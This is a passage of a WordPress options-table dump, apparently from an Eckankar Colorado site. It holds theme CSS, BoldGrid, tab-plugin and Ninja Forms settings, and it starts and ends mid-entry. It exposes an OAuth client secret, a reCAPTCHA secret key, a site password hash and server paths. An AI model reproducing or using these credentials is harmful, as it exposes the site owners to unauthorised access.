!important;\r\n  padding: 10px 24px 8px;\r\n  margin: 0;\r\n  color: #fff;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-event-datetime-info-wrap .mec-event-date-info i, .mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-event-datetime-info-wrap .mec-event-time-info i {\r\n  margin-right: 8px;\r\n  margin-left: -12px !important;\r\n}\r\n.mec-event-date, .mec-event-status {\r\n  text-align: left;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-event-description p {\r\n  font-size: 16px;\r\n  font-weight: 400;\r\n  line-height: 22px;\r\n  margin: 0;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-event-location * {\r\n  font-size: 14px;\r\n  font-weight: 500;\r\n  line-height: 17px;\r\n}\r\n.mec-address .mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 span {\r\n  color: rgba(0, 50, 106, 0.8);\r\n  margin-top: unset;\r\n}\r\n/* --- LOCATION TEXT --- */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-event-location * {\r\n  font-size: 14px;\r\n  font-weight: 600;\r\n  line-height: 19px;\r\n  color: rgba(0, 50, 106, 0.8);\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 span {\r\n  color: #fff;\r\n  margin-top: unset;\r\n}\r\n.mec-liquid-wrap .mec-event-sharing-wrap > li:first-of-type i {\r\n  width: 18px;\r\n  height: 18px;\r\n  color: #00acf8;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-type3 .mec-event-article {\r\n  border: 3px solid #e6f7ff;\r\n  border-radius: 7px;\r\n  padding: 0 0 30px;\r\n  margin: 0 15px;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .event-carousel-type3-head .mec-event-footer-carousel-type3 {\r\n  padding-right: 4px;\r\n  padding-left: 4px;\r\n}\r\n/* --- COLOR CHANGE ON \"EXPIRED\" LABEL--- */\r\n.mec-expired-normal-label {\r\n  background-color: #949494;\r\n}\r\n/* --- FONT SIZE CHANGE ON \"CANCELED\" LABEL--- */\r\n.mec-event-label-captions {\r\n   font-size: 13px;\r\n}\r\n\r\n\r\n/* --- END MEC LIQUID LAYOUT VIEW CAROUSEL EDITS--- */\r\n\r\n\r\n/* --- PASSWORD PROTECTED MESSAGE - THE MAIN CODE IS IN THE \'SNIPPETS\' PLUGIN--- */\r\n.post-password-required form input { margin: 0 auto 10px auto;}\r\n\r\n.post-password-form {\r\n  min-height: initial;\r\n  padding: 30px !important;\r\n    max-width: 590px;\r\n  margin: auto;\r\n  padding-bottom: 0px;\r\n	border-radius: 10px;\r\n	margin-top: 130px;\r\n	margin-bottom: 100px;\r\n}\r\n\r\n.passwordmessage {\r\n	 background-color: #EBEBEB !important;\r\n}\r\n/* --- END PASSWORD PROTECTED MESSAGE --- */\r\n\r\n/* --- HIDE GOOGLE reCAPTCHA V3 BADGE SITEWIDE --- EXCEPT FOR LOGIN PAGE */\r\n.grecaptcha-badge { visibility: hidden; }\r\n\r\n/* --- NEW ESC MODEL 2023 -- \'WELCOME CARD\' ELEMENT IN FRONT OF HERO IMAGE - HOME PAGE --- */\r\n.welcome-card {\r\n	margin-top: -120px;\r\n	padding: 25px;\r\n  position: relative;\r\n  z-index: 11;\r\n	border-radius: 10px;\r\n  overflow: hidden;\r\n  box-shadow: rgb(201, 204, 206) 0px 20px 30px -10px;\r\n	background-color: #fff !important;\r\n	box-sizing: border-box;\r\n}\r\n\r\n/* --- HIDE IN MOBILE DEVICES --- */\r\n@media (max-width: 767px) {\r\n        .hidden-mobile {\r\n          display: none;\r\n        }\r\n      }\r\n\r\n\r\n/* --- OVERRIDE THE \'BOLDGRID BUTTON RAISED CSS --- */\r\n.btn-raised.btn-color-1:hover, .btn-raised.btn-color-1:focus {\r\n  background: #f28a27;\r\n  color: #fff;\r\n}\r\n.btn-color-1, .btn-color-1-flat {\r\n   color: #fff !important;\r\n	\r\n}\r\n.btn-raised.btn-color-1 {\r\n  background: #3475b7;\r\n}\r\n.btn-raised.btn-color-1 {\r\n  border:none;\r\n	font-size: 16px !important;\r\n	color: #fff !important;\r\n  \r\n}\r\n.arrow {\r\n  border: solid #ffffff;\r\n  border-width: 0 3px 3px 0;\r\n  display: inline-block;\r\n  padding: 3px;\r\n	margin-left: 10px;\r\n}\r\n\r\n.right {\r\n  transform: rotate(-45deg);\r\n  -webkit-transform: rotate(-45deg);\r\n}\r\n\";}','yes'),(10092,'boldgrid_install_options','a:20:{s:11:\"author_type\";N;s:11:\"language_id\";N;s:14:\"theme_group_id\";N;s:8:\"theme_id\";i:32;s:18:\"theme_version_type\";s:6:\"stable\";s:11:\"category_id\";i:1;s:14:\"subcategory_id\";i:12;s:11:\"page_set_id\";i:1;s:21:\"page_set_version_type\";s:6:\"stable\";s:3:\"pde\";s:5:\"false\";s:8:\"new_path\";s:19:\"0334819001562360985\";s:13:\"ticket_number\";s:0:\"\";s:16:\"build_profile_id\";i:894420;s:12:\"custom_pages\";N;s:12:\"install_blog\";b:0;s:17:\"install_timestamp\";i:1562362856;s:15:\"subcategory_key\";s:11:\"Photography\";s:16:\"subcategory_name\";s:11:\"Photography\";s:15:\"is_base_pageset\";b:0;s:20:\"parent_category_name\";s:9:\"Portfolio\";}','yes'),(10096,'boldgrid_installed_page_ids','a:8:{i:53;i:7160;i:1;i:7162;i:3;i:7164;i:4;i:7166;i:5;i:7168;i:6;i:7170;i:7;i:7172;i:2;i:7174;}','yes'),(10097,'boldgrid_installed_pages_metadata','a:8:{i:7160;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}i:7162;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}i:7164;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}i:7166;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}i:7168;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}i:7170;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}i:7172;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}i:7174;a:3:{s:11:\"is_readonly\";s:1:\"0\";s:9:\"post_type\";s:4:\"page\";s:11:\"post_status\";s:7:\"publish\";}}','yes'),(10099,'boldgrid_asset','a:3:{s:5:\"image\";a:5:{i:10;a:16:{s:8:\"asset_id\";s:6:\"850080\";s:9:\"coin_cost\";s:1:\"1\";s:4:\"name\";s:102:\"/home/eckank5/eckankar-colorado.org/wp-content/uploads/2019/07/3d28a41a-79ef96b2-javiindy121200143.jpg\";s:13:\"purchase_date\";s:0:\"\";s:13:\"download_date\";s:19:\"2019-07-05 21:41:06\";s:11:\"attribution\";N;s:19:\"attribution_license\";N;s:13:\"attachment_id\";i:7186;s:5:\"width\";s:3:\"450\";s:6:\"height\";s:3:\"299\";s:17:\"image_provider_id\";s:1:\"5\";s:16:\"id_from_provider\";s:8:\"16653587\";s:11:\"orientation\";N;s:10:\"image_size\";s:4:\"blog\";s:19:\"transaction_item_id\";N;s:14:\"transaction_id\";N;}i:13;a:16:{s:8:\"asset_id\";s:6:\"780379\";s:9:\"coin_cost\";N;s:4:\"name\";s:156:\"/home/eckank5/eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tL0RkQkdpcWtJdko4LzQ1MHg2MDA_3D-imhwpb-49a8uprzrms95d9.jpg\";s:13:\"purchase_date\";s:0:\"\";s:13:\"download_date\";s:19:\"2019-07-05 21:41:06\";s:11:\"attribution\";s:170:\"{\"license\":\"10\",\"author_username\":\"Raynaldy Dachlan\",\"author_url\":\"http:\\/\\/unsplash.com\\/@raynaldydachlan\",\"image_homepage\":\"http:\\/\\/unsplash.com\\/photos\\/DdBGiqkIvJ8\"}\";s:19:\"attribution_license\";N;s:13:\"attachment_id\";i:7189;s:5:\"width\";s:3:\"234\";s:6:\"height\";s:3:\"234\";s:17:\"image_provider_id\";N;s:16:\"id_from_provider\";N;s:11:\"orientation\";N;s:10:\"image_size\";N;s:19:\"transaction_item_id\";N;s:14:\"transaction_id\";N;}i:21;a:16:{s:8:\"asset_id\";s:6:\"849780\";s:9:\"coin_cost\";s:1:\"1\";s:4:\"name\";s:101:\"/home/eckank5/eckankar-colorado.org/wp-content/uploads/2019/07/c2c54aef-86c35b42-tomwang150500115.jpg\";s:13:\"purchase_date\";s:0:\"\";s:13:\"download_date\";s:19:\"2019-07-05 21:41:08\";s:11:\"attribution\";N;s:19:\"attribution_license\";N;s:13:\"attachment_id\";i:7197;s:5:\"width\";s:3:\"450\";s:6:\"height\";s:3:\"300\";s:17:\"image_provider_id\";s:1:\"5\";s:16:\"id_from_provider\";s:8:\"40321123\";s:11:\"orientation\";N;s:10:\"image_size\";s:4:\"blog\";s:19:\"transaction_item_id\";N;s:14:\"transaction_id\";N;}i:26;a:16:{s:8:\"asset_id\";s:6:\"849796\";s:9:\"coin_cost\";s:1:\"1\";s:4:\"name\";s:103:\"/home/eckank5/eckankar-colorado.org/wp-content/uploads/2019/07/120b8279-b2534a36-dolgachov151102499.jpg\";s:13:\"purchase_date\";s:0:\"\";s:13:\"download_date\";s:19:\"2019-07-05 21:41:08\";s:11:\"attribution\";N;s:19:\"attribution_license\";N;s:13:\"attachment_id\";i:7202;s:5:\"width\";s:3:\"450\";s:6:\"height\";s:3:\"356\";s:17:\"image_provider_id\";s:1:\"5\";s:16:\"id_from_provider\";s:8:\"48023722\";s:11:\"orientation\";N;s:10:\"image_size\";s:4:\"blog\";s:19:\"transaction_item_id\";N;s:14:\"transaction_id\";N;}i:33;a:16:{s:8:\"asset_id\";s:6:\"849757\";s:9:\"coin_cost\";s:1:\"1\";s:4:\"name\";s:98:\"/home/eckank5/eckankar-colorado.org/wp-content/uploads/2019/07/ba7dd51d-113ed3e6-nyul150300081.jpg\";s:13:\"purchase_date\";s:0:\"\";s:13:\"download_date\";s:19:\"2019-07-05 21:41:09\";s:11:\"attribution\";N;s:19:\"attribution_license\";N;s:13:\"attachment_id\";i:7209;s:5:\"width\";s:3:\"450\";s:6:\"height\";s:3:\"276\";s:17:\"image_provider_id\";s:1:\"5\";s:16:\"id_from_provider\";s:8:\"37664104\";s:11:\"orientation\";N;s:10:\"image_size\";s:4:\"blog\";s:19:\"transaction_item_id\";N;s:14:\"transaction_id\";N;}}s:6:\"plugin\";a:0:{}s:5:\"theme\";a:0:{}}','yes'),(10137,'boldgrid_show_tip_start_editing','yes','yes'),(10141,'boldgrid_framework_init','1','yes'),(10874,'WPLANG','','yes'),(11821,'password_protected_version','2.5.2','yes'),(11825,'password_protected_status','0','yes'),(11826,'password_protected_feeds','0','yes'),(11827,'password_protected_rest','0','yes'),(11828,'password_protected_administrators','1','yes'),(11829,'password_protected_users','0','yes'),(11830,'password_protected_password','fe0d82a56a8584f3b051fc6d6465d108','yes'),(11831,'password_protected_allowed_ip_addresses','','yes'),(11832,'password_protected_remember_me_lifetime','164','yes'),(13536,'oxi_addons_fixed_header_size','120','yes'),(13537,'content_tabs_ultimate_version','','yes'),(13538,'oxi_addons_font_awesome_version','5.3.1||https://use.fontawesome.com/releases/v5.3.1/css/all.css','yes'),(13541,'widget_responsive_tabs_with_accordions_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(13542,'responsive_tabs_with_accordions_activation_date','1562812967','yes'),(13748,'wp_tab_widget_activated','1563073608','yes'),(13749,'widget_wpt_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(13751,'wp_tab_widget_notice_views','3','yes'),(13843,'Tabs_R_default_Settings','s:711:\"a:20:{s:14:\"tabs_sec_title\";s:2:\"no\";s:20:\"show_tabs_title_icon\";s:1:\"2\";s:20:\"show_tabs_icon_align\";s:4:\"left\";s:18:\"enable_tabs_border\";s:3:\"yes\";s:17:\"tabs_title_bg_clr\";s:7:\"#f4f4f4\";s:19:\"tabs_title_icon_clr\";s:7:\"#333333\";s:24:\"select_tabs_title_bg_clr\";s:7:\"#23507d\";s:26:\"select_tabs_title_icon_clr\";s:7:\"#ffffff\";s:16:\"tabs_desc_bg_clr\";s:7:\"#ffffff\";s:18:\"tabs_desc_font_clr\";s:7:\"#333333\";s:10:\"title_size\";s:2:\"14\";s:8:\"des_size\";s:2:\"14\";s:11:\"font_family\";s:9:\"Open Sans\";s:11:\"tabs_styles\";s:1:\"1\";s:10:\"custom_css\";s:0:\"\";s:14:\"tabs_animation\";s:6:\"fadeIn\";s:14:\"tabs_alignment\";s:10:\"horizontal\";s:13:\"tabs_position\";s:4:\"left\";s:11:\"tabs_margin\";s:3:\"yes\";s:19:\"tabs_content_margin\";s:2:\"no\";}\";','yes'),(13844,'widget_wpsm_tabs_r_widget_id','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(13846,'wpsm_tabs_r_review','a:2:{s:4:\"time\";i:1565200813;s:9:\"dismissed\";b:1;}','yes'),(14386,'wonderplugin_tabs_userrole','manage_options','yes'),(14387,'wonderplugin-tabs-engine','Responsive WordPress Tabs','yes'),(14697,'wonderplugin_tabs_information','s:7728:\"O:8:\"stdClass\":16:{s:6:\"author\";s:19:\"Magic Hills Pty Ltd\";s:8:\"homepage\";s:44:\"https://www.wonderplugin.com/wordpress-tabs/\";s:4:\"name\";s:17:\"WonderPlugin Tabs\";s:8:\"requires\";s:3:\"3.6\";s:6:\"tested\";s:5:\"5.2.2\";s:5:\"icons\";a:1:{s:7:\"default\";s:41:\"https://www.wonderplugin.com/icon-128.png\";}s:7:\"version\";s:3:\"6.4\";s:11:\"new_version\";s:3:\"6.4\";s:12:\"last_updated\";s:10:\"2019-06-07\";s:8:\"sections\";a:1:{s:10:\"change log\";s:7097:\"<h4>Version 6.4 - June 7, 2019</h4>\n<ul>\n<li>Add a new skin HTML Content Slider</li>\n<li>Add a function to display PHP info</li>\n</ul>\n<h4>Version 6.3 - May 31, 2019</h4>\n<ul>\n<li>Fix a bug when saving tabs</li>\n</ul>\n<h4>Version 6.2 - May 16, 2019</h4>\n<ul>\n<li>Support WordPress multilingual plugin WPML</li>\n</ul>\n<h4>Version 6.1 - December 6, 2018</h4>\n<ul>\n<li>Support navigation arrows and bullets</li>\n</ul>\n<h4>Version 6.0 - November 21, 2018</h4>\n<ul>\n<li>Add options to specified fixed header width and height</li>\n<li>Fix an issue when the tab icon position is top</li>\n</ul>\n<h4>Version 5.9 - October 8, 2018</h4>\n<ul>\n<li>Add a function to export the tabs content to an XML file</li>\n<li>Create tabs content from an XML file</li>\n</ul>\n<h4>Version 5.8 - August 1, 2018</h4>\n<ul>\n<li>In accordion mode, jump to the top of the tab if the tab header is not visible when switching tabs</li>\n<li>Fix a minor bug in CSS</li>\n</ul>\n<h4>Version 5.7 - June 4, 2018</h4>\n<ul>\n<li>Move Google fonts from the css engine file to the Skin CSS option</li>\n</ul>\n<h4>Version 5.6 - May 27, 2018</h4>\n<ul>\n<li>Support AJAX loading tab contents</li>\n</ul>\n<h4>Version 5.5 - May 18, 2018</h4>\n<ul>\n<li>Fix minor bugs</li>\n</ul>\n<h4>Version 5.4 - May 1, 2018</h4>\n<ul>\n<li>Fix a bug in the skin \"Top Carousel\" when resizing the web browser</li>\n</ul>\n<h4>Version 5.3 - May 1, 2018</h4>\n<ul>\n<li>Change to only show full headers in the skin \"Top Carousel\"</li>\n<li>Fix a bug in transition effects</li>\n</ul>\n<h4>Version 5.2 - April 28, 2018</h4>\n<ul>\n<li>Add a new skin: Top Carousel</li>\n<li>Add a new skin: Left Carousel</li>\n<li>Add a new skin: FAQ</li>\n<li>Directly select Font Awesome icons in the plugin</li>\n<li>Add an option to hide all tab contents on page load</li>\n</ul>\n<h4>Version 5.1 - December 30, 2017</h4>\n<ul>\n<li>Support adding private pages to the tab content by using shortcode</li>\n</ul>\n<h4>Version 5.0 - November 08, 2017</h4>\n<ul>\n<li>Add custom JavaScript to the plugin</li>\n</ul>\n<h4>Version 4.9 - September 16, 2017</h4>\n<ul>\n<li>Support a URL parameter <em>tabgroupid</em> to specify the tab group ID when using the parameter <em>tabid</em> to specify the active tab on page load</li>\n</ul>\n<h4>Version 4.8 - August 16, 2017</h4>\n<ul>\n<li>Add a search function when adding a page to the tab content</li>\n<li>Add a function \"Search and Replace\" in the \"Import/Export\" menu. This function can be used to search and replace domain names in the carousels when you move your WordPress site to a new domain or change to HTTPS secure site.</li>\n<li>Fix the warnings when checking PHP 7 compatibility with the plugin PHP Compatibility Checker</li>\n</ul>\n<h4>Version 4.7 - July 22, 2017</h4>\n<ul>\n<li>Fix an issue in the tabs editor</li>\n</ul>\n<h4>Version 4.6 - July 20, 2017</h4>\n<ul>\n<li>Use Google Analytics to track tab clicks</li>\n</ul>\n<h4>Version 4.5 - June 22, 2017</h4>\n<ul>\n<li>Export/import the tabs to/from XML files</li>\n</ul>\n<h4>Version 4.4 - June 6, 2017</h4>\n<ul>\n<li>Fix the height issue when there are dynamically created contents in the tabs</li>\n</ul>\n<h4>Version 4.3 - April 12, 2017</h4>\n<ul>\n<li>Fix the bug under Internet Explorer and Edge</li>\n</ul>\n<h4>Version 4.2 - April 4, 2017</h4>\n<ul>\n<li>Fix a bug in the editor preview</li>\n</ul>\n<h4>Version 4.1 - April 4, 2017</h4>\n<ul>\n<li>Fix a bug in nested accordion tabs</li>\n</ul>\n<h4>Version 4.0 - January 31, 2017</h4>\n<ul>\n<li>Add an option to change tabs on mouse over</li>\n<li>Fix a bug with the option of closing all tabs in accordion mode on page load</li>\n</ul>\n<h4>Version 3.9</h4>\n<ul>\n<li>When adding a tab group to a page or post by using the shortcode, support calling the tab group by its name, for example [wonderplugin_tabs name=\"Tab Group Name\"]</li>\n</ul>\n<h4>Version 3.8</h4>\n<ul>\n<li>Fix a bug in version 3.7 when the transition effect is fade out</li>\n</ul>\n<h4>Version 3.7</h4>\n<ul>\n<li>Add an option to specify the time delay of window resize event on switching tabs</li>\n</ul>\n<h4>Version 3.6</h4>\n<ul>\n<li>Add an option of whether to load Font Awesome CSS</li>\n</ul>\n<h4>Version 3.5</h4>\n<ul>\n<li>Fix a bug of accordion style tabs</li>\n</ul>\n<h4>Version 3.4</h4>\n<ul>\n<li>Add an ID value to the tabs container div</li>\n</ul>\n<h4>Version 3.3</h4>\n<ul>\n<li>Add an option to switch to accordion mode on small screen devices</li>\n</ul>\n<h4>Version 3.2</h4>\n<ul>\n<li>Change TinyMCE editor default to false</li>\n</ul>\n<h4>Version 3.1</h4>\n<ul>\n<li>Support TinyMCE editor</li>\n<li>Add an option to support tabindex attribute: use Tab key to navigate and focus on a tab, then press the Enter key to display the tab content</li>\n</ul>\n<h4>Version 3.0</h4>\n<ul>\n<li>Add an option to use left/right arrow to navigate between tabs</li>\n</ul>\n<h4>Version 2.9</h4>\n<ul>\n<li>Add a new skin Accordion Tabs for creating <a href=\"https://www.wonderplugin.com/wordpress-tabs/wordpress-accordion-tabs-id8/\" target=\"_blank\" rel=\"noopener noreferrer\">WordPress accordion tabs</a></li>\n<li>Add a new skin Vertical Dark Tabs for creating <a href=\"https://www.wonderplugin.com/wordpress-tabs/wordpress-vertical-tabs-id9/\" target=\"_blank\" rel=\"noopener noreferrer\">WordPress vertical tabs</a></li>\n<li>Add a new skin Horizontal Blue Tabs for creating <a href=\"https://www.wonderplugin.com/wordpress-tabs/responsive-wordpress-tabs-id10/\" target=\"_blank\" rel=\"noopener noreferrer\">WordPress horizontal tabs</a></li>\n</ul>\n<h4>Version 2.8</h4>\n<ul>\n<li>Add an option to save the current tab id in session cookie</li>\n</ul>\n<h4>Version 2.7</h4>\n<ul>\n<li>Support embedding a tab group to another tab</li>\n<li>Use WordPress color picker to configure the color options</li>\n</ul>\n<h4>Version 2.6</h4>\n<ul>\n<li>Fix a bug in plugin update</li>\n</ul>\n<h4>Version 2.5</h4>\n<ul>\n<li>Support trash in tab management. The deleted tab group will be moved to the trash in which you can restore or permanently delete it.</li>\n</ul>\n<h4>Version 2.4</h4>\n<ul>\n<li>Add an option to support adding the new tab to the beginning of the list\n</li>\n<li>Add a function to reverse the tab list</li>\n</ul>\n<h4>Version 2.3</h4>\n<ul>\n<li>Add an option to add CSS display:none to the hidden panel\n</li>\n</ul>\n<h4>Version 2.2</h4>\n<ul>\n<li>Fix the bug when there is iframe in the tabs\n</li>\n<li>Fix the bug when the content has the CSS property of visibility:visible\n</li>\n<li>Add an option to display tab buttons in full width on small screen\n</li>\n</ul>\n<h4>Version 2.1</h4>\n<ul>\n<li>Add an option to remove backslashes in JSON string\n</li>\n</ul>\n<h4>Version 2.0</h4>\n<ul>\n<li>Add an option to specify the width of the navigation arrows\n</li>\n</ul>\n<h4>Version 1.9</h4>\n<ul>\n<li>Add an option to trigger window resize event when tabs load\n</li>\n<li>Trigger jQuery event inited.wonderplugintabs, beforeswitch.wonderplugintabs, afterswitch.wonderplugintabs\n</li>\n</ul>\n<h4>Version 1.8</h4>\n<ul>\n<li>Fix bugs\n</li>\n</ul>\n<h4>Version 1.4</h4>\n<ul>\n<li>Add an option to add slider js files to the footer\n</li>\n<li>Add an option to display tabs in text widgets\n</li>\n</ul>\n<h4>Version 1.3</h4>\n<ul>\n<li>Support version check and update\n</li>\n</ul>\";}s:3:\"key\";s:0:\"\";s:10:\"key_status\";s:5:\"empty\";s:10:\"key_expire\";i:0;s:4:\"slug\";s:17:\"wonderplugin-tabs\";s:6:\"plugin\";s:38:\"wonderplugin-tabs/wonderplugintabs.php\";s:12:\"last_checked\";i:1563671544;}\";','yes'),(16538,'ninja_forms_oauth_client_secret','l8tY2F4wCd0zdwdOCu1oVPiNzecWizWbCgMSFB6N','yes'),(16539,'ninja_forms_version','3.7.0','yes'),(16540,'ninja_forms_db_version','1.4','no'),(16541,'ninja_forms_required_updates','a:6:{s:19:\"CacheCollateActions\";s:19:\"2019-07-15 19:38:56\";s:17:\"CacheCollateForms\";s:19:\"2019-07-15 19:38:56\";s:18:\"CacheCollateFields\";s:19:\"2019-07-15 19:38:56\";s:19:\"CacheCollateObjects\";s:19:\"2019-07-15 19:38:56\";s:19:\"CacheCollateCleanup\";s:19:\"2019-07-15 19:38:56\";s:25:\"CacheFieldReconcilliation\";s:19:\"2019-07-15 19:38:56\";}','yes'),(16542,'ninja_forms_settings','a:14:{s:11:\"date_format\";s:5:\"m/d/Y\";s:8:\"currency\";s:3:\"USD\";s:18:\"recaptcha_site_key\";s:0:\"\";s:20:\"recaptcha_secret_key\";s:0:\"\";s:14:\"recaptcha_lang\";s:2:\"en\";s:19:\"delete_on_uninstall\";i:0;s:21:\"disable_admin_notices\";s:1:\"0\";s:16:\"builder_dev_mode\";s:1:\"1\";s:18:\"opinionated_styles\";s:5:\"light\";s:15:\"recaptcha_theme\";s:5:\"light\";s:15:\"currency_symbol\";s:5:\"&#36;\";s:20:\"recaptcha_site_key_3\";s:40:\"6LeDktUhAAAAAHiDs41sZkBo-lVEOB8_Y-P7X-iH\";s:22:\"recaptcha_secret_key_3\";s:40:\"6LeDktUhAAAAAAXS3zubRB3rEXtl3ZePn0TW5jGP\";s:23:\"load_legacy_submissions\";s:1:\"0\";}','yes'),(16543,'ninja_forms_zuul','56','no'),(16546,'widget_ninja_forms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(16553,'ninja_forms_needs_updates','0','yes'),(16555,'nf_admin_notice','a:1:{s:16:\"one_week_support\";a:3:{s:5:\"start\";s:9:\"7/22/2019\";s:3:\"int\";i:7;s:9:\"dismissed\";i:1;}}','yes'),(16564,'nf_active_promotions','{\"dashboard\":[{\"id\":\"sendwp-banner\",\"location\":\"dashboard\",\"content\":\"<span aria-label=\\\"SendWP. Getting WordPress email into an inbox shouldn\'t be that hard! Never miss another receipt, form submission, or any WordPress email ever again.\\\" style=\\\"cursor:pointer;width:800px;height:83px;border-radius:4px;-moz-border-radius:4px;-webkit-border-radius:4px;background-image:url(\'https:\\/\\/eckankar-colorado.org\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/img\\/promotions\\/dashboard-banner-sendwp.png\');display:block;\\\"><\\/span>\",\"type\":\"sendwp\",\"script\":\"\\n\\t\\t\\t\\tsetTimeout(function(){ \\/* Wait for services to init. *\\/\\n\\t\\t\\t\\t\\tvar data = {\\n\\t\\t\\t\\t\\t\\twidth: 450,\\n\\t\\t\\t\\t\\t\\tcloseOnClick: \'body\',\\n\\t\\t\\t\\t\\t\\tcloseOnEsc: true,\\n\\t\\t\\t\\t\\t\\tcontent: \'<p><h2>Frustrated that WordPress email isn\\u2019t being received?<\\/h2><p>Form submission notifications not hitting your inbox? Some of your visitors getting form feedback via email, others not? By default, your WordPress site sends emails through your web host, which can be unreliable. Your host has spent lots of time and money optimizing to serve your pages, not send your emails.<\\/p><h3>Sign up for SendWP today, and never deal with WordPress email issues again!<\\/h3><p>SendWP is an email service that removes your web host from the email equation.<\\/p><ul style=&quot;list-style-type:initial;margin-left: 20px;&quot;><li>Sends email through dedicated email service, increasing email deliverability.<\\/li><li>Keeps form submission emails out of spam by using a trusted email provider.<\\/li><li>On a shared web host? Don\\u2019t worry about emails being rejected because of blocked IP addresses.<\\/li><li><strong>$1 for the first month. $9\\/month after. Cancel anytime!<\\/strong><\\/li><\\/ul><\\/p><br \\/>\',\\n\\t\\t\\t\\t\\t\\tbtnPrimary: {\\n\\t\\t\\t\\t\\t\\t\\ttext: \'Sign me up!\',\\n\\t\\t\\t\\t\\t\\t\\tcallback: function() {\\n\\t\\t\\t\\t\\t\\t\\t\\tvar spinner = document.createElement(\'span\');\\n\\t\\t\\t\\t\\t\\t\\t\\tspinner.classList.add(\'dashicons\', \'dashicons-update\', \'dashicons-update-spin\');\\n\\t\\t\\t\\t\\t\\t\\t\\tvar w = this.offsetWidth;\\n\\t\\t\\t\\t\\t\\t\\t\\tthis.innerHTML = spinner.outerHTML;\\n\\t\\t\\t\\t\\t\\t\\t\\tthis.style.width = w+\'px\';\\n\\t\\t\\t\\t\\t\\t\\t\\tninja_forms_sendwp_remote_install();\\n\\t\\t\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\t\\t},\\n\\t\\t\\t\\t\\t\\tbtnSecondary: {\\n\\t\\t\\t\\t\\t\\t\\ttext: \'Cancel\',\\n\\t\\t\\t\\t\\t\\t\\tcallback: function() {\\n\\t\\t\\t\\t\\t\\t\\t\\tsendwpModal.toggleModal(false);\\n\\t\\t\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\tvar sendwpModal = new NinjaModal(data);\\n\\t\\t\\t\\t}, 500);\\n\\t\\t\\t\"}]}','no'),(16680,'ninja_forms_optin_reported','1','yes'),(16681,'ninja_forms_memberships_feed','<div class=\"widget widget-memberships\">\r\n<div class=\"pricing-container\">\r\n<div class=\"pricing-block widget\">\r\n<div class=\"pricing-header\">\r\n<div class=\"pricing-title\">Agency</div>\r\n<div class=\"pricing-price\">$499</div>\r\n<div class=\"pricing-savings\">Save $2000+</div>\r\n<div class=\"pricing-cta\"><a class=\"nf-button primary\" href=\"https://ninjaforms.com/checkout/?edd_action=add_to_cart&download_id=203757&utm_source=Ninja+Forms+Plugin&utm_medium=Apps+and+Integrations&utm_campaign=Dashboard+Memberships&utm_content=Agency+Buy+Now\" target=\"_blank\" rel=\"noopener\">Buy Now</a></div>\r\n</div>\r\n<div class=\"pricing-body\">\r\n<div><i class=\"fa fa-users\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">Unlimited Sites</span>\r\n<span>Updates &amp; Support</span></div>\r\n<div><i class=\"fa fa-rocket\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">Fastest Support</span>\r\n<span>1 Year of Updates &amp; Support</span></div>\r\n<div><i class=\"fa fa-trophy\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">All add-ons included!</span>\r\n<ul>\r\n 	<li>Builder PRO Pack</li>\r\n 	<li>PDF Form Submissions</li>\r\n 	<li>Zapier</li>\r\n 	<li>Newsletters (MailChimp, etc.)</li>\r\n 	<li>CRMs (Saleforce, etc.)</li>\r\n 	<li>Payments (PayPal, etc.)</li>\r\n 	<li>And so much more...</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"pricing-block widget highlight\">\r\n\r\n<!--\r\n<div class=\"callout\">\r\n                    Most Popular</div>\r\n-->\r\n<div class=\"pricing-header\">\r\n<div class=\"pricing-title\">Professional</div>\r\n<div class=\"pricing-price\">$199</div>\r\n<div class=\"pricing-savings\">Save $197</div>\r\n<div class=\"pricing-cta\"><a class=\"nf-button primary\" href=\"https://ninjaforms.com/checkout/?edd_action=add_to_cart&download_id=471355&utm_source=Ninja+Forms+Plugin&utm_medium=Apps+and+Integrations&utm_campaign=Dashboard+Memberships&utm_content=Professional+Buy+Now\" target=\"_blank\" rel=\"noopener\">Buy Now</a></div>\r\n</div>\r\n<div class=\"pricing-body\">\r\n<div><i class=\"fa fa-users\" aria-hidden=\"true\"></i>\r\n<span class=\"pricing-body-title\">20 Sites</span>\r\n<span>Updates 